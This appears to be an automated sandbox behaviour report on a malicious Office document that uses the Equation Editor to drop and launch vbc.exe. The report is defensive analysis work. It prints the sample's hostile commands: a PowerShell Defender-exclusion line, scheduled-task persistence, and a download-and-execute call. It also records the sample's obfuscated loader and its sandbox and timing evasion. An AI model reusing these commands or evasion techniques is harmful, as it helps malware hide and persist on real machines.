          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........<......................0.......G.........}.....".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................X........<......................0.......G.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................X.......F<......................0.......S.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................X.......c<......................0.......S.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......t.z.i...e.x.e...................X........<......................0......._.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................X........<......................0......._.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................X........<......................0.......k.......................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P..............................<......................0.......k.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........}.....2.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................x.......F=......................0.......w.........}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x.......t=......................0.......................l.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X........=......................0.................}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................X........=......................0.................}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x........=......................0.................}.............................Jump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`.......................(.P.............H.......X.......~:................................................................).....Jump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exeJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6F84.tmpJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000D33C0 CoInitialize,CoCreateInstance,OleUninitialize,11_2_000D33C0
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.997655136.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070445189.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.996323896.0000000000580000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdb source: vbc.exe, 00000009.00000002.1070927704.0000000001140000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000009.00000003.1067795163.0000000001140000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.1068222397.0000000002C30000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: vbc[1].exe.2.dr, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc.exe.2.dr, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: dDqpEdJEtzi.exe.4.dr, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.vbc.exe.1260000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.1260000.6.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.1260000.2.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.2.vbc.exe.1260000.4.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 9.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: vbc[1].exe.2.dr, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: vbc.exe.2.dr, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: dDqpEdJEtzi.exe.4.dr, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 4.2.vbc.exe.1260000.1.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 4.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 9.0.vbc.exe.1260000.6.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 9.0.vbc.exe.1260000.2.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 9.2.vbc.exe.1260000.4.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: 9.0.vbc.exe.1260000.0.unpack, IceCreamManager/View/MainForm.cs.Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "436C61737350726F7065727479577269", "306F50674D6D", "IceCreamManager" } }, null, null)
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEA40 push esp; retf 002Dh4_2_002EEA41
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409023 push esi; iretd 9_2_0040902F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00416B91 push edx; retf 9_2_00416B92
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00417423 push es; retf 9_2_00417424
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D672 push eax; ret 9_2_0041D678
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D67B push eax; ret 9_2_0041D6E2
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D625 push eax; ret 9_2_0041D678
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D6DC push eax; ret 9_2_0041D6E2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_025CDFA1 push ecx; ret 11_2_025CDFB4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000C9023 push esi; iretd 11_2_000C902F
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63421102824
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63421102824
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63421102824
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03690401

          Boot Survival

          barindex
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 4.2.vbc.exe.27da9ec.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1200, type: MEMORYSTR
          Source: vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000000C8C04 second address: 00000000000C8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000000C8F9E second address: 00000000000C8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1344Thread sleep time: -420000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 1704Thread sleep time: -45733s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 1476Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 1472Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2428Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00408ED0 rdtsc 9_2_00408ED0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 45733Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
